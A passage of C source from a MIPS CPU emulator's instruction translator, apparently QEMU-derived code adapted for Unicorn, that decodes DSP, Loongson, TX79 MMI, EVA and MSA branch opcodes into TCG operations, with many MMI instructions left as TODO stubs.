op2, rd, rs, rt, 1); break; default: /* Invalid */ MIPS_INVAL("MASK ADDU.QB"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_CMPU_EQ_QB_DSP: op2 = MASK_CMPU_EQ_QB(ctx->opcode); switch (op2) { case OPC_PRECR_SRA_PH_W: case OPC_PRECR_SRA_R_PH_W: gen_mipsdsp_arith(ctx, op1, op2, rt, rs, rd); break; case OPC_PRECR_QB_PH: case OPC_PRECRQ_QB_PH: case OPC_PRECRQ_PH_W: case OPC_PRECRQ_RS_PH_W: case OPC_PRECRQU_S_QB_PH: gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); break; case OPC_CMPU_EQ_QB: case OPC_CMPU_LT_QB: case OPC_CMPU_LE_QB: case OPC_CMP_EQ_PH: case OPC_CMP_LT_PH: case OPC_CMP_LE_PH: gen_mipsdsp_add_cmp_pick(ctx, op1, op2, rd, rs, rt, 0); break; case OPC_CMPGU_EQ_QB: case OPC_CMPGU_LT_QB: case OPC_CMPGU_LE_QB: case OPC_CMPGDU_EQ_QB: case OPC_CMPGDU_LT_QB: case OPC_CMPGDU_LE_QB: case OPC_PICK_QB: case OPC_PICK_PH: case OPC_PACKRL_PH: gen_mipsdsp_add_cmp_pick(ctx, op1, op2, rd, rs, rt, 1); break; default: /* Invalid */ MIPS_INVAL("MASK CMPU.EQ.QB"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_SHLL_QB_DSP: gen_mipsdsp_shift(ctx, op1, rd, rs, rt); break; case OPC_DPA_W_PH_DSP: op2 = MASK_DPA_W_PH(ctx->opcode); switch (op2) { case OPC_DPAU_H_QBL: case OPC_DPAU_H_QBR: case OPC_DPSU_H_QBL: case OPC_DPSU_H_QBR: case OPC_DPA_W_PH: case OPC_DPAX_W_PH: case OPC_DPAQ_S_W_PH: case OPC_DPAQX_S_W_PH: case OPC_DPAQX_SA_W_PH: case OPC_DPS_W_PH: case OPC_DPSX_W_PH: case OPC_DPSQ_S_W_PH: case OPC_DPSQX_S_W_PH: case OPC_DPSQX_SA_W_PH: case OPC_MULSAQ_S_W_PH: case OPC_DPAQ_SA_L_W: case OPC_DPSQ_SA_L_W: case OPC_MAQ_S_W_PHL: case OPC_MAQ_S_W_PHR: case OPC_MAQ_SA_W_PHL: case OPC_MAQ_SA_W_PHR: case OPC_MULSA_W_PH: gen_mipsdsp_multiply(ctx, op1, op2, rd, rs, rt, 0); break; default: /* Invalid */ MIPS_INVAL("MASK DPAW.PH"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_INSV_DSP: op2 = MASK_INSV(ctx->opcode); switch (op2) { case OPC_INSV: check_dsp(ctx); { TCGv t0, t1; if (rt == 0) { break; } t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); gen_load_gpr(tcg_ctx, t1, rs); gen_helper_insv(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_env, t1, t0); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); break; } default: /* Invalid */ MIPS_INVAL("MASK INSV"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_APPEND_DSP: gen_mipsdsp_append(env, ctx, op1, rt, rs, rd); break; case OPC_EXTR_W_DSP: op2 = MASK_EXTR_W(ctx->opcode); switch (op2) { case OPC_EXTR_W: case OPC_EXTR_R_W: case OPC_EXTR_RS_W: case OPC_EXTR_S_H: case OPC_EXTRV_S_H: case OPC_EXTRV_W: case OPC_EXTRV_R_W: case OPC_EXTRV_RS_W: case OPC_EXTP: case OPC_EXTPV: case OPC_EXTPDP: case OPC_EXTPDPV: gen_mipsdsp_accinsn(ctx, op1, op2, rt, rs, rd, 1); break; case OPC_RDDSP: gen_mipsdsp_accinsn(ctx, op1, op2, rd, rs, rt, 1); break; case OPC_SHILO: case OPC_SHILOV: case OPC_MTHLIP: case OPC_WRDSP: gen_mipsdsp_accinsn(ctx, op1, op2, rd, rs, rt, 0); break; default: /* Invalid */ MIPS_INVAL("MASK EXTR.W"); generate_exception_end(ctx, EXCP_RI); break; } break; #if defined(TARGET_MIPS64) case OPC_DDIV_G_2E: case OPC_DDIVU_G_2E: case OPC_DMULT_G_2E: case OPC_DMULTU_G_2E: case OPC_DMOD_G_2E: case OPC_DMODU_G_2E: check_insn(ctx, INSN_LOONGSON2E); gen_loongson_integer(ctx, op1, rd, rs, rt); break; case OPC_ABSQ_S_QH_DSP: op2 = MASK_ABSQ_S_QH(ctx->opcode); switch (op2) { case OPC_PRECEQ_L_PWL: case OPC_PRECEQ_L_PWR: case OPC_PRECEQ_PW_QHL: case OPC_PRECEQ_PW_QHR: case OPC_PRECEQ_PW_QHLA: case OPC_PRECEQ_PW_QHRA: case OPC_PRECEQU_QH_OBL: case OPC_PRECEQU_QH_OBR: case OPC_PRECEQU_QH_OBLA: case OPC_PRECEQU_QH_OBRA: case OPC_PRECEU_QH_OBL: case OPC_PRECEU_QH_OBR: case OPC_PRECEU_QH_OBLA: case OPC_PRECEU_QH_OBRA: case OPC_ABSQ_S_OB: case OPC_ABSQ_S_PW: case OPC_ABSQ_S_QH: gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); break; case OPC_REPL_OB: case OPC_REPL_PW: case OPC_REPL_QH: case OPC_REPLV_OB: case OPC_REPLV_PW: case OPC_REPLV_QH: gen_mipsdsp_bitinsn(ctx, op1, op2, rd, rt); break; default: /* Invalid */ MIPS_INVAL("MASK ABSQ_S.QH"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_ADDU_OB_DSP: op2 = MASK_ADDU_OB(ctx->opcode); switch (op2) { case OPC_RADDU_L_OB: case OPC_SUBQ_PW: case OPC_SUBQ_S_PW: case OPC_SUBQ_QH: case OPC_SUBQ_S_QH: case OPC_SUBU_OB: case OPC_SUBU_S_OB: case OPC_SUBU_QH: case OPC_SUBU_S_QH: case OPC_SUBUH_OB: case OPC_SUBUH_R_OB: case OPC_ADDQ_PW: case OPC_ADDQ_S_PW: case OPC_ADDQ_QH: case OPC_ADDQ_S_QH: case OPC_ADDU_OB: case OPC_ADDU_S_OB: case OPC_ADDU_QH: case OPC_ADDU_S_QH: case OPC_ADDUH_OB: case OPC_ADDUH_R_OB: gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); break; case OPC_MULEQ_S_PW_QHL: case OPC_MULEQ_S_PW_QHR: case OPC_MULEU_S_QH_OBL: case OPC_MULEU_S_QH_OBR: case OPC_MULQ_RS_QH: gen_mipsdsp_multiply(ctx, op1, op2, rd, rs, rt, 1); break; default: /* Invalid */ MIPS_INVAL("MASK ADDU.OB"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_CMPU_EQ_OB_DSP: op2 = MASK_CMPU_EQ_OB(ctx->opcode); switch (op2) { case OPC_PRECR_SRA_QH_PW: case OPC_PRECR_SRA_R_QH_PW: /* Return value is rt. */ gen_mipsdsp_arith(ctx, op1, op2, rt, rs, rd); break; case OPC_PRECR_OB_QH: case OPC_PRECRQ_OB_QH: case OPC_PRECRQ_PW_L: case OPC_PRECRQ_QH_PW: case OPC_PRECRQ_RS_QH_PW: case OPC_PRECRQU_S_OB_QH: gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); break; case OPC_CMPU_EQ_OB: case OPC_CMPU_LT_OB: case OPC_CMPU_LE_OB: case OPC_CMP_EQ_QH: case OPC_CMP_LT_QH: case OPC_CMP_LE_QH: case OPC_CMP_EQ_PW: case OPC_CMP_LT_PW: case OPC_CMP_LE_PW: gen_mipsdsp_add_cmp_pick(ctx, op1, op2, rd, rs, rt, 0); break; case OPC_CMPGDU_EQ_OB: case OPC_CMPGDU_LT_OB: case OPC_CMPGDU_LE_OB: case OPC_CMPGU_EQ_OB: case OPC_CMPGU_LT_OB: case OPC_CMPGU_LE_OB: case OPC_PACKRL_PW: case OPC_PICK_OB: case OPC_PICK_PW: case OPC_PICK_QH: gen_mipsdsp_add_cmp_pick(ctx, op1, op2, rd, rs, rt, 1); break; default: /* Invalid */ MIPS_INVAL("MASK CMPU_EQ.OB"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_DAPPEND_DSP: gen_mipsdsp_append(env, ctx, op1, rt, rs, rd); break; case OPC_DEXTR_W_DSP: op2 = MASK_DEXTR_W(ctx->opcode); switch (op2) { case OPC_DEXTP: case OPC_DEXTPDP: case OPC_DEXTPDPV: case OPC_DEXTPV: case OPC_DEXTR_L: case OPC_DEXTR_R_L: case OPC_DEXTR_RS_L: case OPC_DEXTR_W: case OPC_DEXTR_R_W: case OPC_DEXTR_RS_W: case OPC_DEXTR_S_H: case OPC_DEXTRV_L: case OPC_DEXTRV_R_L: case OPC_DEXTRV_RS_L: case OPC_DEXTRV_S_H: case OPC_DEXTRV_W: case OPC_DEXTRV_R_W: case OPC_DEXTRV_RS_W: gen_mipsdsp_accinsn(ctx, op1, op2, rt, rs, rd, 1); break; case OPC_DMTHLIP: case OPC_DSHILO: case OPC_DSHILOV: gen_mipsdsp_accinsn(ctx, op1, op2, rd, rs, rt, 0); break; default: /* Invalid */ MIPS_INVAL("MASK EXTR.W"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_DPAQ_W_QH_DSP: op2 = MASK_DPAQ_W_QH(ctx->opcode); switch (op2) { case OPC_DPAU_H_OBL: case OPC_DPAU_H_OBR: case OPC_DPSU_H_OBL: case OPC_DPSU_H_OBR: case OPC_DPA_W_QH: case OPC_DPAQ_S_W_QH: case OPC_DPS_W_QH: case OPC_DPSQ_S_W_QH: case OPC_MULSAQ_S_W_QH: case OPC_DPAQ_SA_L_PW: case OPC_DPSQ_SA_L_PW: case OPC_MULSAQ_S_L_PW: gen_mipsdsp_multiply(ctx, op1, op2, rd, rs, rt, 0); break; case OPC_MAQ_S_W_QHLL: case OPC_MAQ_S_W_QHLR: case OPC_MAQ_S_W_QHRL: case OPC_MAQ_S_W_QHRR: case OPC_MAQ_SA_W_QHLL: case OPC_MAQ_SA_W_QHLR: case OPC_MAQ_SA_W_QHRL: case OPC_MAQ_SA_W_QHRR: case OPC_MAQ_S_L_PWL: case OPC_MAQ_S_L_PWR: case OPC_DMADD: case OPC_DMADDU: case OPC_DMSUB: case OPC_DMSUBU: gen_mipsdsp_multiply(ctx, op1, op2, rd, rs, rt, 0); break; default: /* Invalid */ MIPS_INVAL("MASK DPAQ.W.QH"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_DINSV_DSP: op2 = MASK_INSV(ctx->opcode); switch (op2) { case OPC_DINSV: { TCGv t0, t1; if (rt == 0) { break; } check_dsp(ctx); t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); gen_load_gpr(tcg_ctx, t1, rs); gen_helper_dinsv(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_env, t1, t0); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); break; } default: /* Invalid */ MIPS_INVAL("MASK DINSV"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_SHLL_OB_DSP: gen_mipsdsp_shift(ctx, op1, rd, rs, rt); break; #endif default: /* Invalid */ MIPS_INVAL("special3_legacy"); generate_exception_end(ctx, EXCP_RI); break; } } #if defined(TARGET_MIPS64) static void decode_mmi0(CPUMIPSState *env, DisasContext *ctx) { uint32_t opc = MASK_MMI0(ctx->opcode); switch (opc) { case MMI_OPC_0_PADDW: /* TODO: MMI_OPC_0_PADDW */ case MMI_OPC_0_PSUBW: /* TODO: MMI_OPC_0_PSUBW */ case MMI_OPC_0_PCGTW: /* TODO: MMI_OPC_0_PCGTW */ case MMI_OPC_0_PMAXW: /* TODO: MMI_OPC_0_PMAXW */ case MMI_OPC_0_PADDH: /* TODO: MMI_OPC_0_PADDH */ case MMI_OPC_0_PSUBH: /* TODO: MMI_OPC_0_PSUBH */ case MMI_OPC_0_PCGTH: /* TODO: MMI_OPC_0_PCGTH */ case MMI_OPC_0_PMAXH: /* TODO: MMI_OPC_0_PMAXH */ case MMI_OPC_0_PADDB: /* TODO: MMI_OPC_0_PADDB */ case MMI_OPC_0_PSUBB: /* TODO: MMI_OPC_0_PSUBB */ case MMI_OPC_0_PCGTB: /* TODO: MMI_OPC_0_PCGTB */ case MMI_OPC_0_PADDSW: /* TODO: MMI_OPC_0_PADDSW */ case MMI_OPC_0_PSUBSW: /* TODO: MMI_OPC_0_PSUBSW */ case MMI_OPC_0_PEXTLW: /* TODO: MMI_OPC_0_PEXTLW */ case MMI_OPC_0_PPACW: /* TODO: MMI_OPC_0_PPACW */ case MMI_OPC_0_PADDSH: /* TODO: MMI_OPC_0_PADDSH */ case MMI_OPC_0_PSUBSH: /* TODO: MMI_OPC_0_PSUBSH */ case MMI_OPC_0_PEXTLH: /* TODO: MMI_OPC_0_PEXTLH */ case MMI_OPC_0_PPACH: /* TODO: MMI_OPC_0_PPACH */ case MMI_OPC_0_PADDSB: /* TODO: MMI_OPC_0_PADDSB */ case MMI_OPC_0_PSUBSB: /* TODO: MMI_OPC_0_PSUBSB */ case MMI_OPC_0_PEXTLB: /* TODO: MMI_OPC_0_PEXTLB */ case MMI_OPC_0_PPACB: /* TODO: MMI_OPC_0_PPACB */ case MMI_OPC_0_PEXT5: /* TODO: MMI_OPC_0_PEXT5 */ case MMI_OPC_0_PPAC5: /* TODO: MMI_OPC_0_PPAC5 */ generate_exception_end(ctx, EXCP_RI); /* TODO: MMI_OPC_CLASS_MMI0 */ break; default: MIPS_INVAL("TX79 MMI class MMI0"); generate_exception_end(ctx, EXCP_RI); break; } } static void decode_mmi1(CPUMIPSState *env, DisasContext *ctx) { uint32_t opc = MASK_MMI1(ctx->opcode); switch (opc) { case MMI_OPC_1_PABSW: /* TODO: MMI_OPC_1_PABSW */ case MMI_OPC_1_PCEQW: /* TODO: MMI_OPC_1_PCEQW */ case MMI_OPC_1_PMINW: /* TODO: MMI_OPC_1_PMINW */ case MMI_OPC_1_PADSBH: /* TODO: MMI_OPC_1_PADSBH */ case MMI_OPC_1_PABSH: /* TODO: MMI_OPC_1_PABSH */ case MMI_OPC_1_PCEQH: /* TODO: MMI_OPC_1_PCEQH */ case MMI_OPC_1_PMINH: /* TODO: MMI_OPC_1_PMINH */ case MMI_OPC_1_PCEQB: /* TODO: MMI_OPC_1_PCEQB */ case MMI_OPC_1_PADDUW: /* TODO: MMI_OPC_1_PADDUW */ case MMI_OPC_1_PSUBUW: /* TODO: MMI_OPC_1_PSUBUW */ case MMI_OPC_1_PEXTUW: /* TODO: MMI_OPC_1_PEXTUW */ case MMI_OPC_1_PADDUH: /* TODO: MMI_OPC_1_PADDUH */ case MMI_OPC_1_PSUBUH: /* TODO: MMI_OPC_1_PSUBUH */ case MMI_OPC_1_PEXTUH: /* TODO: MMI_OPC_1_PEXTUH */ case MMI_OPC_1_PADDUB: /* TODO: MMI_OPC_1_PADDUB */ case MMI_OPC_1_PSUBUB: /* TODO: MMI_OPC_1_PSUBUB */ case MMI_OPC_1_PEXTUB: /* TODO: MMI_OPC_1_PEXTUB */ case MMI_OPC_1_QFSRV: /* TODO: MMI_OPC_1_QFSRV */ generate_exception_end(ctx, EXCP_RI); /* TODO: MMI_OPC_CLASS_MMI1 */ break; default: MIPS_INVAL("TX79 MMI class MMI1"); generate_exception_end(ctx, EXCP_RI); break; } } static void decode_mmi2(CPUMIPSState *env, DisasContext *ctx) { uint32_t opc = MASK_MMI2(ctx->opcode); switch (opc) { case MMI_OPC_2_PMADDW: /* TODO: MMI_OPC_2_PMADDW */ case MMI_OPC_2_PSLLVW: /* TODO: MMI_OPC_2_PSLLVW */ case MMI_OPC_2_PSRLVW: /* TODO: MMI_OPC_2_PSRLVW */ case MMI_OPC_2_PMSUBW: /* TODO: MMI_OPC_2_PMSUBW */ case MMI_OPC_2_PMFHI: /* TODO: MMI_OPC_2_PMFHI */ case MMI_OPC_2_PMFLO: /* TODO: MMI_OPC_2_PMFLO */ case MMI_OPC_2_PINTH: /* TODO: MMI_OPC_2_PINTH */ case MMI_OPC_2_PMULTW: /* TODO: MMI_OPC_2_PMULTW */ case MMI_OPC_2_PDIVW: /* TODO: MMI_OPC_2_PDIVW */ case MMI_OPC_2_PMADDH: /* TODO: MMI_OPC_2_PMADDH */ case MMI_OPC_2_PHMADH: /* TODO: MMI_OPC_2_PHMADH */ case MMI_OPC_2_PAND: /* TODO: MMI_OPC_2_PAND */ case MMI_OPC_2_PXOR: /* TODO: MMI_OPC_2_PXOR */ case MMI_OPC_2_PMSUBH: /* TODO: MMI_OPC_2_PMSUBH */ case MMI_OPC_2_PHMSBH: /* TODO: MMI_OPC_2_PHMSBH */ case MMI_OPC_2_PEXEH: /* TODO: MMI_OPC_2_PEXEH */ case MMI_OPC_2_PREVH: /* TODO: MMI_OPC_2_PREVH */ case MMI_OPC_2_PMULTH: /* TODO: MMI_OPC_2_PMULTH */ case MMI_OPC_2_PDIVBW: /* TODO: MMI_OPC_2_PDIVBW */ case MMI_OPC_2_PEXEW: /* TODO: MMI_OPC_2_PEXEW */ case MMI_OPC_2_PROT3W: /* TODO: MMI_OPC_2_PROT3W */ generate_exception_end(ctx, EXCP_RI); /* TODO: MMI_OPC_CLASS_MMI2 */ break; case MMI_OPC_2_PCPYLD: gen_mmi_pcpyld(ctx); break; default: MIPS_INVAL("TX79 MMI class MMI2"); generate_exception_end(ctx, EXCP_RI); break; } } static void decode_mmi3(CPUMIPSState *env, DisasContext *ctx) { uint32_t opc = MASK_MMI3(ctx->opcode); switch (opc) { case MMI_OPC_3_PMADDUW: /* TODO: MMI_OPC_3_PMADDUW */ case MMI_OPC_3_PSRAVW: /* TODO: MMI_OPC_3_PSRAVW */ case MMI_OPC_3_PMTHI: /* TODO: MMI_OPC_3_PMTHI */ case MMI_OPC_3_PMTLO: /* TODO: MMI_OPC_3_PMTLO */ case MMI_OPC_3_PINTEH: /* TODO: MMI_OPC_3_PINTEH */ case MMI_OPC_3_PMULTUW: /* TODO: MMI_OPC_3_PMULTUW */ case MMI_OPC_3_PDIVUW: /* TODO: MMI_OPC_3_PDIVUW */ case MMI_OPC_3_POR: /* TODO: MMI_OPC_3_POR */ case MMI_OPC_3_PNOR: /* TODO: MMI_OPC_3_PNOR */ case MMI_OPC_3_PEXCH: /* TODO: MMI_OPC_3_PEXCH */ case MMI_OPC_3_PEXCW: /* TODO: MMI_OPC_3_PEXCW */ generate_exception_end(ctx, EXCP_RI); /* TODO: MMI_OPC_CLASS_MMI3 */ break; case MMI_OPC_3_PCPYH: gen_mmi_pcpyh(ctx); break; case MMI_OPC_3_PCPYUD: gen_mmi_pcpyud(ctx); break; default: MIPS_INVAL("TX79 MMI class MMI3"); generate_exception_end(ctx, EXCP_RI); break; } } static void decode_mmi(CPUMIPSState *env, DisasContext *ctx) { uint32_t opc = MASK_MMI(ctx->opcode); int rs = extract32(ctx->opcode, 21, 5); int rt = extract32(ctx->opcode, 16, 5); int rd = extract32(ctx->opcode, 11, 5); switch (opc) { case MMI_OPC_CLASS_MMI0: decode_mmi0(env, ctx); break; case MMI_OPC_CLASS_MMI1: decode_mmi1(env, ctx); break; case MMI_OPC_CLASS_MMI2: decode_mmi2(env, ctx); break; case MMI_OPC_CLASS_MMI3: decode_mmi3(env, ctx); break; case MMI_OPC_MULT1: case MMI_OPC_MULTU1: case MMI_OPC_MADD: case MMI_OPC_MADDU: case MMI_OPC_MADD1: case MMI_OPC_MADDU1: gen_mul_txx9(ctx, opc, rd, rs, rt); break; case MMI_OPC_DIV1: case MMI_OPC_DIVU1: gen_div1_tx79(ctx, opc, rs, rt); break; case MMI_OPC_MTLO1: case MMI_OPC_MTHI1: gen_HILO1_tx79(ctx, opc, rs); break; case MMI_OPC_MFLO1: case MMI_OPC_MFHI1: gen_HILO1_tx79(ctx, opc, rd); break; case MMI_OPC_PLZCW: /* TODO: MMI_OPC_PLZCW */ case MMI_OPC_PMFHL: /* TODO: MMI_OPC_PMFHL */ case MMI_OPC_PMTHL: /* TODO: MMI_OPC_PMTHL */ case MMI_OPC_PSLLH: /* TODO: MMI_OPC_PSLLH */ case MMI_OPC_PSRLH: /* TODO: MMI_OPC_PSRLH */ case MMI_OPC_PSRAH: /* TODO: MMI_OPC_PSRAH */ case MMI_OPC_PSLLW: /* TODO: MMI_OPC_PSLLW */ case MMI_OPC_PSRLW: /* TODO: MMI_OPC_PSRLW */ case MMI_OPC_PSRAW: /* TODO: MMI_OPC_PSRAW */ generate_exception_end(ctx, EXCP_RI); /* TODO: MMI_OPC_CLASS_MMI */ break; default: MIPS_INVAL("TX79 MMI class"); generate_exception_end(ctx, EXCP_RI); break; } } static void gen_mmi_lq(CPUMIPSState *env, DisasContext *ctx) { generate_exception_end(ctx, EXCP_RI); /* TODO: MMI_OPC_LQ */ } static void gen_mmi_sq(DisasContext *ctx, int base, int rt, int offset) { generate_exception_end(ctx, EXCP_RI); /* TODO: MMI_OPC_SQ */ } /* * The TX79-specific instruction Store Quadword * * +--------+-------+-------+------------------------+ * | 011111 | base | rt | offset | SQ * +--------+-------+-------+------------------------+ * 6 5 5 16 * * has the same opcode as the Read Hardware Register instruction * * +--------+-------+-------+-------+-------+--------+ * | 011111 | 00000 | rt | rd | 00000 | 111011 | RDHWR * +--------+-------+-------+-------+-------+--------+ * 6 5 5 5 5 6 * * that is required, trapped and emulated by the Linux kernel. However, all * RDHWR encodings yield address error exceptions on the TX79 since the SQ * offset is odd. Therefore all valid SQ instructions can execute normally. * In user mode, QEMU must verify the upper and lower 11 bits to distinguish * between SQ and RDHWR, as the Linux kernel does. */ static void decode_mmi_sq(CPUMIPSState *env, DisasContext *ctx) { int base = extract32(ctx->opcode, 21, 5); int rt = extract32(ctx->opcode, 16, 5); int offset = extract32(ctx->opcode, 0, 16); gen_mmi_sq(ctx, base, rt, offset); } #endif static void decode_opc_special3(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rs, rt, rd, sa; uint32_t op1, op2; int16_t imm; rs = (ctx->opcode >> 21) & 0x1f; rt = (ctx->opcode >> 16) & 0x1f; rd = (ctx->opcode >> 11) & 0x1f; sa = (ctx->opcode >> 6) & 0x1f; imm = sextract32(ctx->opcode, 7, 9); op1 = MASK_SPECIAL3(ctx->opcode); /* * EVA loads and stores overlap Loongson 2E instructions decoded by * decode_opc_special3_legacy(), so be careful to allow their decoding when * EVA is absent. */ if (ctx->eva) { switch (op1) { case OPC_LWLE: case OPC_LWRE: check_insn_opc_removed(ctx, ISA_MIPS32R6); /* fall through */ case OPC_LBUE: case OPC_LHUE: case OPC_LBE: case OPC_LHE: case OPC_LLE: case OPC_LWE: check_cp0_enabled(ctx); gen_ld(ctx, op1, rt, rs, imm); return; case OPC_SWLE: case OPC_SWRE: check_insn_opc_removed(ctx, ISA_MIPS32R6); /* fall through */ case OPC_SBE: case OPC_SHE: case OPC_SWE: check_cp0_enabled(ctx); gen_st(ctx, op1, rt, rs, imm); return; case OPC_SCE: check_cp0_enabled(ctx); gen_st_cond(ctx, rt, rs, imm, MO_TESL, true); return; case OPC_CACHEE: check_cp0_enabled(ctx); if (ctx->hflags & MIPS_HFLAG_ITC_CACHE) { gen_cache_operation(ctx, rt, rs, imm); } /* Treat as NOP. */ return; case OPC_PREFE: check_cp0_enabled(ctx); /* Treat as NOP. */ return; } } switch (op1) { case OPC_EXT: case OPC_INS: check_insn(ctx, ISA_MIPS32R2); gen_bitops(ctx, op1, rt, rs, sa, rd); break; case OPC_BSHFL: op2 = MASK_BSHFL(ctx->opcode); switch (op2) { case OPC_ALIGN: case OPC_ALIGN_1: case OPC_ALIGN_2: case OPC_ALIGN_3: case OPC_BITSWAP: check_insn(ctx, ISA_MIPS32R6); decode_opc_special3_r6(env, ctx); break; default: check_insn(ctx, ISA_MIPS32R2); gen_bshfl(ctx, op2, rt, rd); break; } break; #if defined(TARGET_MIPS64) case OPC_DEXTM: case OPC_DEXTU: case OPC_DEXT: case OPC_DINSM: case OPC_DINSU: case OPC_DINS: check_insn(ctx, ISA_MIPS64R2); check_mips_64(ctx); gen_bitops(ctx, op1, rt, rs, sa, rd); break; case OPC_DBSHFL: op2 = MASK_DBSHFL(ctx->opcode); switch (op2) { case OPC_DALIGN: case OPC_DALIGN_1: case OPC_DALIGN_2: case OPC_DALIGN_3: case OPC_DALIGN_4: case OPC_DALIGN_5: case OPC_DALIGN_6: case OPC_DALIGN_7: case OPC_DBITSWAP: check_insn(ctx, ISA_MIPS32R6); decode_opc_special3_r6(env, ctx); break; default: check_insn(ctx, ISA_MIPS64R2); check_mips_64(ctx); op2 = MASK_DBSHFL(ctx->opcode); gen_bshfl(ctx, op2, rt, rd); break; } break; #endif case OPC_RDHWR: gen_rdhwr(ctx, rt, rd, extract32(ctx->opcode, 6, 3)); break; case OPC_FORK: check_mt(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); gen_load_gpr(tcg_ctx, t1, rs); gen_helper_fork(tcg_ctx, t0, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } break; case OPC_YIELD: check_mt(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_helper_yield(tcg_ctx, t0, tcg_ctx->cpu_env, t0); gen_store_gpr(tcg_ctx, t0, rd); tcg_temp_free(tcg_ctx, t0); } break; default: if (ctx->insn_flags & ISA_MIPS32R6) { decode_opc_special3_r6(env, ctx); } else { decode_opc_special3_legacy(env, ctx); } } } /* MIPS SIMD Architecture (MSA) */ static inline int check_msa_access(DisasContext *ctx) { if (unlikely((ctx->hflags & MIPS_HFLAG_FPU) && !(ctx->hflags & MIPS_HFLAG_F64))) { generate_exception_end(ctx, EXCP_RI); return 0; } if (unlikely(!(ctx->hflags & MIPS_HFLAG_MSA))) { if (ctx->insn_flags & ASE_MSA) { generate_exception_end(ctx, EXCP_MSADIS); return 0; } else { generate_exception_end(ctx, EXCP_RI); return 0; } } return 1; } static void gen_check_zero_element(TCGContext *tcg_ctx, TCGv tresult, uint8_t df, uint8_t wt) { /* generates tcg ops to check if any element is 0 */ /* Note this function only works with MSA_WRLEN = 128 */ uint64_t eval_zero_or_big = 0; uint64_t eval_big = 0; TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); switch (df) { case DF_BYTE: eval_zero_or_big = 0x0101010101010101ULL; eval_big = 0x8080808080808080ULL; break; case DF_HALF: eval_zero_or_big = 0x0001000100010001ULL; eval_big = 0x8000800080008000ULL; break; case DF_WORD: eval_zero_or_big = 0x0000000100000001ULL; eval_big = 0x8000000080000000ULL; break; case DF_DOUBLE: eval_zero_or_big = 0x0000000000000001ULL; eval_big = 0x8000000000000000ULL; break; } tcg_gen_subi_i64(tcg_ctx, t0, tcg_ctx->msa_wr_d[wt << 1], eval_zero_or_big); tcg_gen_andc_i64(tcg_ctx, t0, t0, tcg_ctx->msa_wr_d[wt << 1]); tcg_gen_andi_i64(tcg_ctx, t0, t0, eval_big); tcg_gen_subi_i64(tcg_ctx, t1, tcg_ctx->msa_wr_d[(wt << 1) + 1], eval_zero_or_big); tcg_gen_andc_i64(tcg_ctx, t1, t1, tcg_ctx->msa_wr_d[(wt << 1) + 1]); tcg_gen_andi_i64(tcg_ctx, t1, t1, eval_big); tcg_gen_or_i64(tcg_ctx, t0, t0, t1); /* if all bits are zero then all elements are not zero */ /* if some bit is non-zero then some element is zero */ tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_NE, t0, t0, 0); tcg_gen_trunc_i64_tl(tcg_ctx, tresult, t0); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } static void gen_msa_branch(CPUMIPSState *env, DisasContext *ctx, uint32_t op1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint8_t df = (ctx->opcode >> 21) & 0x3; uint8_t wt = (ctx->opcode >> 16) & 0x1f; int64_t s16 = (int16_t)ctx->opcode; check_msa_access(ctx); if (ctx->hflags & MIPS_HFLAG_BMASK) { generate_exception_end(ctx, EXCP_RI); return; } switch (op1) { case OPC_BZ_V: case OPC_BNZ_V: { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_or_i64(tcg_ctx, t0, tcg_ctx->msa_wr_d[wt << 1], tcg_ctx->msa_wr_d[(wt << 1) + 1]); tcg_gen_setcondi_i64(tcg_ctx, (op1 == OPC_BZ_V) ? TCG_COND_EQ : TCG_COND_NE, t0, t0, 0); tcg_gen_trunc_i64_tl(tcg_ctx, tcg_ctx->bcond, t0); tcg_temp_free_i64(tcg_ctx, t0); } break; case OPC_BZ_B: case OPC_BZ_H: case OPC_BZ_W: case OPC_BZ_D: gen_check_zero_element(tcg_ctx, tcg_ctx->bcond, df, wt); break; case OPC_BNZ_B: case OPC_BNZ_H: case OPC_BNZ_W: case OPC_BNZ_D: gen_check_zero_element(tcg_ctx, tcg_ctx->bcond, df, wt); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->bcond, tcg_ctx->bcond, 0); break; } ctx->btarget = ctx->base.pc_next + (s16 << 2) + 4; ctx->hflags |= MIPS_HFLAG_BC; ctx->hflags |= MIPS_HFLAG_BDS32; } static void gen_msa_i8(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #define MASK_MSA_I8(op) (MASK_MSA_MINOR(op) | (op & (0x03 << 24))) uint8_t i8 = (ctx->opcode >> 16) & 